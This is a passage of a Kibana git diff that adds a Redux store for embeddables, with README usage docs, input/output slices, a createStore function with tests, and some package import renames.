action.payload; + }, + }, +}); + +export const actions = { + ...input.actions, + ...output.actions, +}; + +export class HelloWorld extends Embeddable { + readonly store = createStore(this, { + reducer: { + input: input.reducer, + output: output.reducer, + } + }); + + // ... +} +``` + +There is a way to provide a custom reducer that will manipulate the root state: +```typescript +// ... + +import { createAction, createRducer } from '@reduxjs/toolkit'; + +// ... + +const setGreeting = createAction('greeting'); +const setMessage = createAction('message'); +const reducer = createReducer({} as State, (builder) => + builder + .addCase(setGreeting, (state, action) => ({ ...state, input: { ...state.input, greeting: action.payload } })) + .addCase(setMessage, (state, action) => ({ ...state, output: { ...state.output, message: action.payload } })) +); + +export const actions = { + setGreeting, + setMessage, +}; + +export class HelloWorld extends Embeddable { + readonly store = createStore(this, { reducer }); + + // ... +} +``` + +#### Custom State +Sometimes, there is a need to store a custom state next to the embeddable state. +This can be achieved by passing a custom reducer. + +```tsx +import React from 'react'; +import { render } from 'react-dom'; +import { createSlice } from '@reduxjs/toolkit'; +import { Embeddable, IEmbeddable } from '@kbn/embeddable-plugin/public'; +import { createStore, State } from '@kbn/embeddable-plugin/public/store'; + +interface ComponentState { + foo?: string; + bar?: string; +} + +export interface HelloWorldState extends State { + component: ComponentState; +} + +const component = createSlice({ + name: 'hello-world-component', + initialState: {} as ComponentState, + reducers: { + setFoo(state, action: PayloadAction) { + state.foo = action.payload; + }, + setBar(state, action: PayloadAction) { + state.bar = action.payload; + }, + }, +}); + +export const { actions } = component; + +export class HelloWorld extends Embeddable { + readonly store = createStore(this, { + preloadedState: { + component: { + foo: 'bar', + bar: 'foo', + } + }, + reducer: { component: component.reducer } + }); + + // ... +} +``` + +#### Typings +When using the `useSelector` hook, it is convenient to have a `State` type to guarantee type safety and determine types implicitly. + +For the state containing input and output substates only, it is enough to use a utility type `State`: +```typescript +import { useSelector } from 'react-redux'; +import type { State } from '@kbn/embeddable-plugin/public/store'; +import type { Embeddable } from './some_embeddable'; + +// ... +const title = useSelector>((state) => state.input.title); +``` + +For the more complex case, the best way would be to define a state type separately: +```typescript +import { useSelector } from 'react-redux'; +import type { State } from '@kbn/embeddable-plugin/public/store'; +import type { Embeddable } from './some_embeddable'; + +interface EmbeddableState extends State { + foo?: string; + bar?: Bar; +} + +// ... +const foo = useSelector((state) => state.foo); +``` + +#### Advanced Usage +In case when there is a need to enhance the produced store in some way (e.g., perform custom serialization or debugging), it is possible to use [parameters](https://redux-toolkit.js.org/api/configureStore#parameters) supported by the `configureStore` function. + +In case when custom serialization is needed, that should be done using middleware. The embeddable plugin's `createStore` function does not apply any middleware, so all the synchronization job is done outside the store. + ## API Please use automatically generated API reference or generated TypeDoc comments to find the complete documentation. diff --git a/src/plugins/embeddable/public/__stories__/embeddable_panel.stories.tsx b/src/plugins/embeddable/public/__stories__/embeddable_panel.stories.tsx index 1f15b942fb589..97e8b83b9f7b1 100644 --- a/src/plugins/embeddable/public/__stories__/embeddable_panel.stories.tsx +++ b/src/plugins/embeddable/public/__stories__/embeddable_panel.stories.tsx @@ -25,6 +25,7 @@ import { CoreTheme } from '@kbn/core-theme-browser'; import type { Action } from '@kbn/ui-actions-plugin/public'; import { CONTEXT_MENU_TRIGGER, EmbeddablePanel, PANEL_BADGE_TRIGGER, ViewMode } from '..'; +import { actions } from '../store'; import { HelloWorldEmbeddable } from './hello_world_embeddable'; const layout: DecoratorFn = (story) => { @@ -93,20 +94,16 @@ const HelloWorldEmbeddablePanel = forwardRef< const theme = useContext(ThemeContext) as CoreTheme; useEffect(() => theme$.next(theme), [theme$, theme]); + useEffect(() => { + embeddable.store.dispatch(actions.input.setTitle(title)); + }, [embeddable.store, title]); + useEffect(() => { + embeddable.store.dispatch( + actions.input.setViewMode(viewMode ? ViewMode.VIEW : ViewMode.EDIT) + ); + }, [embeddable.store, viewMode]); useEffect( - () => - embeddable.updateInput({ - title, - viewMode: viewMode ? ViewMode.VIEW : ViewMode.EDIT, - lastReloadRequestTime: new Date().getMilliseconds(), - }), - [embeddable, title, viewMode] - ); - useEffect( - () => - embeddable.updateOutput({ - loading, - }), + () => void embeddable.store.dispatch(actions.output.setLoading(loading)), [embeddable, loading] ); useImperativeHandle(ref, () => ({ embeddable })); @@ -162,7 +159,9 @@ export function DefaultWithBadges({ badges, ...props }: DefaultWithBadgesProps) useEffect( () => - ref.current?.embeddable.updateInput({ lastReloadRequestTime: new Date().getMilliseconds() }), + void ref.current?.embeddable.store.dispatch( + actions.input.setLastReloadRequestTime(new Date().getMilliseconds()) + ), [getActions] ); @@ -207,7 +206,9 @@ export function DefaultWithContextMenu({ items, ...props }: DefaultWithContextMe useEffect( () => - ref.current?.embeddable.updateInput({ lastReloadRequestTime: new Date().getMilliseconds() }), + void ref.current?.embeddable.store.dispatch( + actions.input.setLastReloadRequestTime(new Date().getMilliseconds()) + ), [getActions] ); @@ -230,7 +231,10 @@ interface DefaultWithErrorProps extends HelloWorldEmbeddablePanelProps { export function DefaultWithError({ message, ...props }: DefaultWithErrorProps) { const ref = useRef>(null); - useEffect(() => ref.current?.embeddable.updateOutput({ error: new Error(message) }), [message]); + useEffect( + () => void ref.current?.embeddable.store.dispatch(actions.output.setError(new Error(message))), + [message] + ); return ; } @@ -256,7 +260,10 @@ export function DefaultWithCustomError({ message, ...props }: DefaultWithErrorPr }), [] ); - useEffect(() => ref.current?.embeddable.updateOutput({ error: new Error(message) }), [message]); + useEffect( + () => void ref.current?.embeddable.store.dispatch(actions.output.setError(new Error(message))), + [message] + ); return ; } diff --git a/src/plugins/embeddable/public/__stories__/hello_world_embeddable.tsx b/src/plugins/embeddable/public/__stories__/hello_world_embeddable.tsx index 2ea923704be77..5cf2c5fdc46e8 100644 --- a/src/plugins/embeddable/public/__stories__/hello_world_embeddable.tsx +++ b/src/plugins/embeddable/public/__stories__/hello_world_embeddable.tsx @@ -8,10 +8,15 @@ import React from 'react'; import { render } from 'react-dom'; +import { connect, Provider } from 'react-redux'; import { EuiEmptyPrompt } from '@elastic/eui'; import { Embeddable, IEmbeddable } from '..'; +import { createStore, State } from '../store'; export class HelloWorldEmbeddable extends Embeddable { + // eslint-disable-next-line @kbn/eslint/no_this_in_property_initializers + readonly store = createStore(this); + readonly type = 'hello-world'; renderError: IEmbeddable['renderError']; @@ -19,16 +24,17 @@ export class HelloWorldEmbeddable extends Embeddable { reload() {} render(node: HTMLElement) { - render(, node); - - this.reload = this.render.bind(this, node); + const App = connect((state: State) => ({ body: state.input.title }))(EuiEmptyPrompt); + + render( + + + , + node + ); } setErrorRenderer(renderer: IEmbeddable['renderError']) { this.renderError = renderer; } - - updateOutput(...args: Parameters): void { - return super.updateOutput(...args); - } } diff --git a/src/plugins/embeddable/public/lib/attribute_service/attribute_service.tsx b/src/plugins/embeddable/public/lib/attribute_service/attribute_service.tsx index cb93ef13b918d..17a41e841abff 100644 --- a/src/plugins/embeddable/public/lib/attribute_service/attribute_service.tsx +++ b/src/plugins/embeddable/public/lib/attribute_service/attribute_service.tsx @@ -45,7 +45,7 @@ export interface AttributeServiceOptions< attributes: SavedObjectAttributes, savedObjectId?: string ) => Promise<{ id?: string } | { error: Error }>; - checkForDuplicateTitle: (props: OnSaveProps) => Promise; + checkForDuplicateTitle: (props: OnSaveProps) => Promise; unwrapMethod?: ( savedObjectId: string ) => Promise>; diff --git a/src/plugins/embeddable/public/lib/embeddables/embeddable.tsx b/src/plugins/embeddable/public/lib/embeddables/embeddable.tsx index 001cb98afa6c1..94025320ec86d 100644 --- a/src/plugins/embeddable/public/lib/embeddables/embeddable.tsx +++ b/src/plugins/embeddable/public/lib/embeddables/embeddable.tsx @@ -41,8 +41,10 @@ export abstract class Embeddable< protected output: TEmbeddableOutput; protected input: TEmbeddableInput; - private readonly input$: Rx.BehaviorSubject; - private readonly output$: Rx.BehaviorSubject; + private readonly inputSubject = new Rx.ReplaySubject(1); + private readonly outputSubject = new Rx.ReplaySubject(1); + private readonly input$ = this.inputSubject.asObservable(); + private readonly output$ = this.outputSubject.asObservable(); protected renderComplete = new RenderCompleteDispatcher(); @@ -71,8 +73,8 @@ export abstract class Embeddable< }; this.parent = parent; - this.input$ = new Rx.BehaviorSubject(this.input); - this.output$ = new Rx.BehaviorSubject(this.output); + this.inputSubject.next(this.input); + this.outputSubject.next(this.output); if (parent) { this.parentSubscription = Rx.merge(parent.getInput$(), parent.getOutput$()).subscribe(() => { @@ -89,12 +91,7 @@ export abstract class Embeddable< map(({ title }) => title || ''), distinctUntilChanged() ) - .subscribe( - (title) => { - this.renderComplete.setTitle(title); - }, - () => {} - ); + .subscribe((title) => this.renderComplete.setTitle(title)); } public reportsEmbeddableLoad() { @@ -142,11 +139,11 @@ export abstract class Embeddable< } public getInput$(): Readonly> { - return this.input$.asObservable(); + return this.input$; } public getOutput$(): Readonly> { - return this.output$.asObservable(); + return this.output$; } public getOutput(): Readonly { @@ -238,8 +235,8 @@ export abstract class Embeddable< public destroy(): void { this.destroyed = true; - this.input$.complete(); - this.output$.complete(); + this.inputSubject.complete(); + this.outputSubject.complete(); if (this.parentSubscription) { this.parentSubscription.unsubscribe(); @@ -257,20 +254,20 @@ export abstract class Embeddable< } } - protected updateOutput(outputChanges: Partial): void { + public updateOutput(outputChanges: Partial): void { const newOutput = { ...this.output, ...outputChanges, }; if (!fastIsEqual(this.output, newOutput)) { this.output = newOutput; - this.output$.next(this.output); + this.outputSubject.next(this.output); } } protected onFatalError(e: Error) { this.fatalError = e; - this.output$.error(e); + this.outputSubject.error(e); // if the container is waiting for this embeddable to complete loading, // a fatal error counts as complete. if (this.deferEmbeddableLoad && this.parent?.isContainer) { @@ -282,7 +279,7 @@ export abstract class Embeddable< if (!fastIsEqual(this.input, newInput)) { const oldLastReloadRequestTime = this.input.lastReloadRequestTime; this.input = newInput; - this.input$.next(newInput); + this.inputSubject.next(newInput); this.updateOutput({ title: getPanelTitle(this.input, this.output), } as Partial); diff --git a/src/plugins/embeddable/public/lib/embeddables/i_embeddable.ts b/src/plugins/embeddable/public/lib/embeddables/i_embeddable.ts index 9037de1a10075..1c9bdebcefc9b 100644 --- a/src/plugins/embeddable/public/lib/embeddables/i_embeddable.ts +++ b/src/plugins/embeddable/public/lib/embeddables/i_embeddable.ts @@ -142,6 +142,12 @@ export interface IEmbeddable< */ updateInput(changes: Partial): void; + /** + * Updates output state with the given changes. + * @param changes + */ + updateOutput(changes: Partial): void; + /** * Returns an observable which will be notified when input state changes. */ diff --git a/src/plugins/embeddable/public/store/create_store.test.ts b/src/plugins/embeddable/public/store/create_store.test.ts new file mode 100644 index 0000000000000..52ac1eb32c8dc --- /dev/null +++ b/src/plugins/embeddable/public/store/create_store.test.ts @@ -0,0 +1,245 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. + */ + +// eslint-disable-next-line max-classes-per-file +import { createAction, createReducer, createSlice, PayloadAction } from '@reduxjs/toolkit'; +import type { Store } from 'redux'; +import { + defaultEmbeddableFactoryProvider, + Container, + ContainerInput, + Embeddable, + EmbeddableInput, + EmbeddableOutput, +} from '../lib'; +import { createStore, State } from './create_store'; +import { input } from './input_slice'; +import { output } from './output_slice'; + +interface TestEmbeddableInput extends EmbeddableInput { + custom?: string; +} + +interface TestEmbeddableOutput extends EmbeddableOutput { + custom?: string; +} + +interface TestContainerInput extends ContainerInput { + custom?: string; +} + +class TestEmbeddable extends Embeddable { + type = 'test'; + reload = jest.fn(); + render = jest.fn(); +} + +class TestContainer extends Container, TestContainerInput> { + type = 'test'; + + getInheritedInput() { + return { + custom: this.input.custom, + }; + } +} + +describe('createStore', () => { + let embeddable: TestEmbeddable; + let store: Store>; + + beforeEach(() => { + embeddable = new TestEmbeddable({ id: '12345' }, { title: 'Test' }); + store = createStore(embeddable); + }); + + it('should populate the state with the embeddable input', () => { + expect(store.getState()).toHaveProperty('input', expect.objectContaining({ id: '12345' })); + }); + + it('should populate the state with the embeddable output', () => { + expect(store.getState()).toHaveProperty('output', expect.objectContaining({ title: 'Test' })); + }); + + it('should update the embeddable input on action dispatch', () => { + store.dispatch(input.actions.setTitle('Something')); + + expect(store.getState()).toHaveProperty('input.title', 'Something'); + }); + + it('should update the embeddable output on action dispatch', () => { + store.dispatch(output.actions.setTitle('Something')); + + expect(store.getState()).toHaveProperty('output.title', 'Something'); + }); + + it('should group input updates on multiple dispatch calls', async () => { + jest.spyOn(embeddable, 'updateInput'); + store.dispatch(input.actions.setTitle('Something')); + store.dispatch(input.actions.setHidePanelTitles(true)); + await new Promise((resolve) => setTimeout(resolve)); + + expect(embeddable.updateInput).toHaveBeenCalledTimes(1); + expect(embeddable.updateInput).nthCalledWith( + 1, + expect.objectContaining({ title: 'Something', hidePanelTitles: true }) + ); + }); + + it('should group output updates on multiple dispatch calls', async () => { + jest.spyOn(embeddable, 'updateOutput'); + store.dispatch(output.actions.setTitle('Something')); + store.dispatch(output.actions.setLoading(true)); + await new Promise((resolve) => setTimeout(resolve)); + + expect(embeddable.updateOutput).toHaveBeenCalledTimes(1); + expect(embeddable.updateOutput).nthCalledWith( + 1, + expect.objectContaining({ title: 'Something', loading: true }) + ); + }); + + it('should not update input on output changes', async () => { + jest.spyOn(embeddable, 'updateInput'); + store.dispatch(output.actions.setTitle('Something')); + await new Promise((resolve) => setTimeout(resolve)); + + expect(embeddable.updateInput).not.toHaveBeenCalled(); + }); + + it('should sync input changes', () => { + jest.spyOn(embeddable, 'updateInput'); + embeddable.updateInput({ title: 'Something' }); + + expect(embeddable.updateInput).toHaveBeenCalledTimes(1); + expect(store.getState()).toHaveProperty('input.title', 'Something'); + }); + + it('should sync output changes', () => { + jest.spyOn(embeddable, 'updateOutput'); + embeddable.updateOutput({ title: 'Something' }); + + expect(embeddable.updateOutput).toHaveBeenCalledTimes(1); + expect(store.getState()).toHaveProperty('output.title', 'Something'); + }); + + it('should provide a way to use a custom reducer', async () => { + const setCustom = createAction('custom'); + const customStore = createStore(embeddable, { + reducer: { + input: createReducer({} as TestEmbeddableInput, (builder) => + builder.addCase(setCustom, (state, action) => ({ ...state, custom: action.payload })) + ), + }, + }); + + jest.spyOn(embeddable, 'updateInput'); + customStore.dispatch(input.actions.setTitle('Something')); + customStore.dispatch(setCustom('Something else')); + await new Promise((resolve) => setTimeout(resolve)); + + expect(embeddable.updateInput).toHaveBeenCalledWith( + expect.objectContaining({ custom: 'Something else', title: 'Something' }) + ); + }); + + it('should provide a way to use a custom slice', async () => { + const slice = createSlice({ + name: 'test', + initialState: {} as State, + reducers: { + setCustom(state, action: PayloadAction) { + state.input.custom = action.payload; + state.output.custom = action.payload; + }, + }, + }); + const customStore = createStore(embeddable, { reducer: slice.reducer }); + + jest.spyOn(embeddable, 'updateInput'); + jest.spyOn(embeddable, 'updateOutput'); + customStore.dispatch(input.actions.setTitle('Something')); + customStore.dispatch(slice.actions.setCustom('Something else')); + await new Promise((resolve) => setTimeout(resolve)); + + expect(embeddable.updateInput).toHaveBeenCalledWith( + expect.objectContaining({ custom: 'Something else', title: 'Something' }) + ); + expect(embeddable.updateOutput).toHaveBeenCalledWith( + expect.objectContaining({ custom: 'Something else' }) + ); + }); + + describe('of a nested embeddable', () => { + const factory = defaultEmbeddableFactoryProvider< + TestEmbeddableInput, + TestEmbeddableOutput, + TestEmbeddable + >({ + type: 'test', + getDisplayName: () => 'Test', + isEditable: async () => true, + create: async (data, parent) => new TestEmbeddable(data, {}, parent), + }); + const getFactory = jest.fn().mockReturnValue(factory); + + let container: TestContainer; + + beforeEach(async () => { + container = new TestContainer( + { custom: 'something', id: 'id', panels: {} }, + { embeddableLoaded: {} }, + getFactory + ); + embeddable = (await container.addNewEmbeddable('test', { id: '12345' })) as TestEmbeddable; + store = createStore(embeddable); + }); + + it('should populate inherited input', () => { + expect(store.getState()).toHaveProperty('input.custom', 'something'); + }); + + it('should override inherited input on dispatch', async () => { + store.dispatch( + input.actions.update({ custom: 'something else' } as Partial) + ); + await new Promise((resolve) => setTimeout(resolve)); + + expect(store.getState()).toHaveProperty('input.custom', 'something else'); + expect(container.getInput()).toHaveProperty( + 'input.custom', + expect.not.stringMatching('something else') + ); + }); + + it('should restore value from the inherited input', async () => { + store.dispatch( + input.actions.update({ custom: 'something else' } as Partial) + ); + await new Promise((resolve) => setTimeout(resolve)); + store.dispatch(input.actions.update({ custom: undefined } as Partial)); + await new Promise((resolve) => setTimeout(resolve)); + + expect(store.getState()).toHaveProperty('input.custom', 'something'); + }); + + it('should not override inherited input on dispatch', async () => { + store.dispatch(input.actions.setTitle('Something')); + await new Promise((resolve) => setTimeout(resolve)); + container.updateInput({ custom: 'something else' }); + + expect(store.getState()).toHaveProperty( + 'input', + expect.objectContaining({ + title: 'Something', + custom: 'something else', + }) + ); + }); + }); +}); diff --git a/src/plugins/embeddable/public/store/create_store.ts b/src/plugins/embeddable/public/store/create_store.ts new file mode 100644 index 0000000000000..135f793c079dd --- /dev/null +++ b/src/plugins/embeddable/public/store/create_store.ts @@ -0,0 +1,132 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. + */ + +import { chain, isEmpty, keys } from 'lodash'; +import { combineReducers, Reducer, Store, ReducersMapObject } from 'redux'; +import { configureStore, ConfigureStoreOptions } from '@reduxjs/toolkit'; +import { + debounceTime, + distinctUntilChanged, + filter, + last, + map, + pluck, + share, + takeUntil, + Observable, +} from 'rxjs'; +import reduceReducers from 'reduce-reducers'; +import type { Optional } from 'utility-types'; +import type { IEmbeddable } from '../lib'; +import { input } from './input_slice'; +import { output } from './output_slice'; + +export interface State { + input: E extends IEmbeddable ? I : never; + output: E extends IEmbeddable ? O : never; +} + +export interface CreateStoreOptions + extends Omit, 'reducer'> { + reducer?: Reducer | Optional, keyof State>; +} + +function createReducer( + reducer?: CreateStoreOptions['reducer'] +): Reducer | ReducersMapObject { + if (reducer instanceof Function) { + const generic = combineReducers>({ + input: input.reducer, + output: output.reducer, + }) as Reducer; + + return reduceReducers(generic, reducer) as Reducer; + } + + return { + ...(reducer ?? {}), + input: reducer?.input ? reduceReducers(input.reducer, reducer.input) : input.reducer, + output: reducer?.output ? reduceReducers(output.reducer, reducer.output) : output.reducer, + } as ReducersMapObject; +} + +function diff>(previous: T, current: T) { + return chain(current) + .keys() + .concat(keys(previous)) + .uniq() + .filter((key) => previous[key] !== current[key]) + .map((key) => [key, current[key]]) + .fromPairs() + .value() as Partial; +} + +/** + * Creates a Redux store for the given embeddable. + * @param embeddable The embeddable instance. + * @param options The custom options to pass to the `configureStore` call. + * @returns The Redux store. + */ +export function createStore = State>( + embeddable: E, + { preloadedState, reducer, ...options }: CreateStoreOptions = {} +): Store { + const store = configureStore({ + ...options, + preloadedState: { + input: embeddable.getInput(), + output: embeddable.getOutput(), + ...(preloadedState ?? {}), + } as NonNullable, + reducer: createReducer(reducer), + }); + + const state$ = new Observable((subscriber) => { + subscriber.add(store.subscribe(() => subscriber.next(store.getState()))); + }).pipe(share()); + const input$ = embeddable.getInput$(); + const output$ = embeddable.getOutput$(); + + state$ + .pipe( + takeUntil(input$.pipe(last())), + pluck('input'), + distinctUntilChanged(), + map((value) => diff(embeddable.getInput(), value)), + filter((patch) => !isEmpty(patch)), + debounceTime(0) + ) + .subscribe((patch) => embeddable.updateInput(patch)); + + state$ + .pipe( + takeUntil(output$.pipe(last())), + pluck('output'), + distinctUntilChanged(), + map((value) => diff(embeddable.getOutput(), value)), + filter((patch) => !isEmpty(patch)), + debounceTime(0) + ) + .subscribe((patch) => embeddable.updateOutput(patch)); + + input$ + .pipe( + map((value) => diff(store.getState().input, value)), + filter((patch) => !isEmpty(patch)) + ) + .subscribe((patch) => store.dispatch(input.actions.update(patch))); + + output$ + .pipe( + map((value) => diff(store.getState().output, value)), + filter((patch) => !isEmpty(patch)) + ) + .subscribe((patch) => store.dispatch(output.actions.update(patch))); + + return store; +} diff --git a/packages/shared-ux/button/exit_full_screen/mocks/jest.config.js b/src/plugins/embeddable/public/store/index.ts similarity index 57% rename from packages/shared-ux/button/exit_full_screen/mocks/jest.config.js rename to src/plugins/embeddable/public/store/index.ts index 3485a061a38ee..05567e0215589 100644 --- a/packages/shared-ux/button/exit_full_screen/mocks/jest.config.js +++ b/src/plugins/embeddable/public/store/index.ts @@ -6,8 +6,12 @@ * Side Public License, v 1. */ -module.exports = { - preset: '@kbn/test/jest_node', - rootDir: '../../../../..', - roots: ['/packages/shared-ux/button/exit_full_screen/mocks'], +import { input } from './input_slice'; +import { output } from './output_slice'; + +export type { CreateStoreOptions, State } from './create_store'; +export { createStore } from './create_store'; +export const actions = { + input: input.actions, + output: output.actions, }; diff --git a/src/plugins/embeddable/public/store/input_slice.ts b/src/plugins/embeddable/public/store/input_slice.ts new file mode 100644 index 0000000000000..da4bc6618ae11 --- /dev/null +++ b/src/plugins/embeddable/public/store/input_slice.ts @@ -0,0 +1,56 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. + */ + +import { createSlice, PayloadAction } from '@reduxjs/toolkit'; +import type { EmbeddableInput } from '../lib'; + +export const input = createSlice({ + name: 'input', + initialState: {} as EmbeddableInput, + reducers: { + setDisabledActions(state, action: PayloadAction) { + state.disabledActions = action.payload; + }, + setDisableTriggers(state, action: PayloadAction) { + state.disableTriggers = action.payload; + }, + setEnhancements(state, action: PayloadAction) { + state.enhancements = action.payload; + }, + setExecutionContext(state, action: PayloadAction) { + state.executionContext = action.payload; + }, + setHidePanelTitles(state, action: PayloadAction) { + state.hidePanelTitles = action.payload; + }, + setLastReloadRequestTime( + state, + action: PayloadAction + ) { + state.lastReloadRequestTime = action.payload; + }, + setSearchSessionId(state, action: PayloadAction) { + state.searchSessionId = action.payload; + }, + setSyncColors(state, action: PayloadAction) { + state.syncColors = action.payload; + }, + setSyncTooltips(state, action: PayloadAction) { + state.syncTooltips = action.payload; + }, + setTitle(state, action: PayloadAction) { + state.title = action.payload; + }, + setViewMode(state, action: PayloadAction) { + state.viewMode = action.payload; + }, + update(state, action: PayloadAction>) { + return { ...state, ...action.payload }; + }, + }, +}); diff --git a/src/plugins/embeddable/public/store/output_slice.ts b/src/plugins/embeddable/public/store/output_slice.ts new file mode 100644 index 0000000000000..c3cbaf6875893 --- /dev/null +++ b/src/plugins/embeddable/public/store/output_slice.ts @@ -0,0 +1,50 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. + */ + +import { createSlice, PayloadAction } from '@reduxjs/toolkit'; +import type { EmbeddableOutput } from '../lib'; + +export const output = createSlice({ + name: 'output', + initialState: {} as EmbeddableOutput, + reducers: { + setLoading(state, action: PayloadAction) { + state.loading = action.payload; + }, + setRendered(state, action: PayloadAction) { + state.rendered = action.payload; + }, + setError(state, action: PayloadAction) { + state.error = action.payload; + }, + setEditUrl(state, action: PayloadAction) { + state.editUrl = action.payload; + }, + setEditApp(state, action: PayloadAction) { + state.editApp = action.payload; + }, + setEditPath(state, action: PayloadAction) { + state.editPath = action.payload; + }, + setDefaultTitle(state, action: PayloadAction) { + state.defaultTitle = action.payload; + }, + setTitle(state, action: PayloadAction) { + state.title = action.payload; + }, + setEditable(state, action: PayloadAction) { + state.editable = action.payload; + }, + setSavedObjectId(state, action: PayloadAction) { + state.savedObjectId = action.payload; + }, + update(state, action: PayloadAction>) { + return { ...state, ...action.payload }; + }, + }, +}); diff --git a/src/plugins/es_ui_shared/static/forms/hook_form_lib/hooks/use_form.ts b/src/plugins/es_ui_shared/static/forms/hook_form_lib/hooks/use_form.ts index b6b45c76e7115..95ed985bf1a2f 100644 --- a/src/plugins/es_ui_shared/static/forms/hook_form_lib/hooks/use_form.ts +++ b/src/plugins/es_ui_shared/static/forms/hook_form_lib/hooks/use_form.ts @@ -8,7 +8,7 @@ import { useState, useRef, useEffect, useMemo, useCallback } from 'react'; import { get, mergeWith } from 'lodash'; -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import { FormHook, FieldHook, FormData, FieldsMap, FormConfig } from '../types'; import { diff --git a/src/plugins/es_ui_shared/static/forms/hook_form_lib/lib/utils.ts b/src/plugins/es_ui_shared/static/forms/hook_form_lib/lib/utils.ts index 54f6726abb115..fe41de2947795 100644 --- a/src/plugins/es_ui_shared/static/forms/hook_form_lib/lib/utils.ts +++ b/src/plugins/es_ui_shared/static/forms/hook_form_lib/lib/utils.ts @@ -6,7 +6,7 @@ * Side Public License, v 1. */ -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import { FieldHook } from '../types'; interface GenericObject { diff --git a/src/plugins/home/public/application/components/guided_onboarding/getting_started.tsx b/src/plugins/home/public/application/components/guided_onboarding/getting_started.tsx index b5415064eea17..9f27a0194a3ca 100644 --- a/src/plugins/home/public/application/components/guided_onboarding/getting_started.tsx +++ b/src/plugins/home/public/application/components/guided_onboarding/getting_started.tsx @@ -21,7 +21,7 @@ import { import { css } from '@emotion/react'; import { METRIC_TYPE } from '@kbn/analytics'; import { i18n } from '@kbn/i18n'; -import { KibanaPageTemplate } from '@kbn/shared-ux-components'; +import { KibanaPageTemplate } from '@kbn/shared-ux-page-kibana-template'; import { getServices } from '../../kibana_services'; import { KEY_ENABLE_WELCOME } from '../home'; diff --git a/src/plugins/interactive_setup/public/use_form.ts b/src/plugins/interactive_setup/public/use_form.ts index abd00edee6750..47768400dd775 100644 --- a/src/plugins/interactive_setup/public/use_form.ts +++ b/src/plugins/interactive_setup/public/use_form.ts @@ -6,12 +6,13 @@ * Side Public License, v 1. */ -import { set } from '@elastic/safer-lodash-set'; import { cloneDeep, cloneDeepWith, get } from 'lodash'; import type { ChangeEventHandler, FocusEventHandler, ReactEventHandler } from 'react'; import { useState } from 'react'; import useAsyncFn from 'react-use/lib/useAsyncFn'; +import { set } from '@kbn/safer-lodash-set'; + export type FormReturnTuple = [FormState, FormProps]; export interface FormProps { diff --git a/src/plugins/kibana_overview/public/components/overview/overview.test.tsx b/src/plugins/kibana_overview/public/components/overview/overview.test.tsx index 99d8b45cdf27b..0fbedc5c3367e 100644 --- a/src/plugins/kibana_overview/public/components/overview/overview.test.tsx +++ b/src/plugins/kibana_overview/public/components/overview/overview.test.tsx @@ -13,16 +13,16 @@ import { act } from 'react-dom/test-utils'; import { ReactWrapper } from 'enzyme'; import { EuiLoadingSpinner } from '@elastic/eui'; import { mountWithIntl } from '@kbn/test-jest-helpers'; -import { KibanaPageTemplate } from '@kbn/shared-ux-components'; +import { KibanaPageTemplate } from '@kbn/shared-ux-page-kibana-template'; import type { FeatureCatalogueCategory } from '@kbn/home-plugin/public'; import { AnalyticsNoDataPageKibanaProvider } from '@kbn/shared-ux-page-analytics-no-data'; import { hasESData, hasUserDataView } from './overview.test.mocks'; import { Overview } from './overview'; -jest.mock('@kbn/shared-ux-components', () => { +jest.mock('@kbn/shared-ux-page-kibana-template', () => { const MockedComponent: string = 'MockedKibanaPageTemplate'; const mockedModule = { - ...jest.requireActual('@kbn/shared-ux-components'), + ...jest.requireActual('@kbn/shared-ux-page-kibana-template'), KibanaPageTemplate: () => { return ; }, diff --git a/src/plugins/kibana_overview/public/components/overview/overview.tsx b/src/plugins/kibana_overview/public/components/overview/overview.tsx index 738b278b17b36..245fcb12c7afd 100644 --- a/src/plugins/kibana_overview/public/components/overview/overview.tsx +++ b/src/plugins/kibana_overview/public/components/overview/overview.tsx @@ -25,7 +25,7 @@ import { overviewPageActions, OverviewPageFooter, } from '@kbn/kibana-react-plugin/public'; -import { KibanaPageTemplate } from '@kbn/shared-ux-components'; +import { KibanaPageTemplate } from '@kbn/shared-ux-page-kibana-template'; import { KibanaSolutionAvatar } from '@kbn/shared-ux-avatar-solution'; import { AnalyticsNoDataPageKibanaProvider, diff --git a/src/plugins/kibana_react/public/app_links/index.ts b/src/plugins/kibana_react/public/app_links/index.ts index ca09b2a3bfe36..3bfd7baca0c02 100644 --- a/src/plugins/kibana_react/public/app_links/index.ts +++ b/src/plugins/kibana_react/public/app_links/index.ts @@ -5,5 +5,5 @@ * in compliance with, at your election, the Elastic License 2.0 or the Server * Side Public License, v 1. */ -/** @deprecated Use `RedirectAppLinks` from `@kbn/shared-ux-components */ +/** @deprecated Use `RedirectAppLinks` from `@kbn/shared-ux-link-redirect-app` */ export { RedirectAppLinks } from './redirect_app_link'; diff --git a/src/plugins/kibana_react/public/app_links/redirect_app_link.test.tsx b/src/plugins/kibana_react/public/app_links/redirect_app_link.test.tsx index 133cab06e6b6f..f4ce0d3ff80d3 100644 --- a/src/plugins/kibana_react/public/app_links/redirect_app_link.test.tsx +++ b/src/plugins/kibana_react/public/app_links/redirect_app_link.test.tsx @@ -9,7 +9,7 @@ import React, { MouseEvent } from 'react'; import { mount } from 'enzyme'; import { applicationServiceMock } from '@kbn/core/public/mocks'; -/** @deprecated Use `RedirectAppLinks` from `@kbn/shared-ux-components */ +/** @deprecated Use `RedirectAppLinks` from `@kbn/shared-ux-link-redirect-app` */ import { RedirectAppLinks } from './redirect_app_link'; import { BehaviorSubject } from 'rxjs'; diff --git 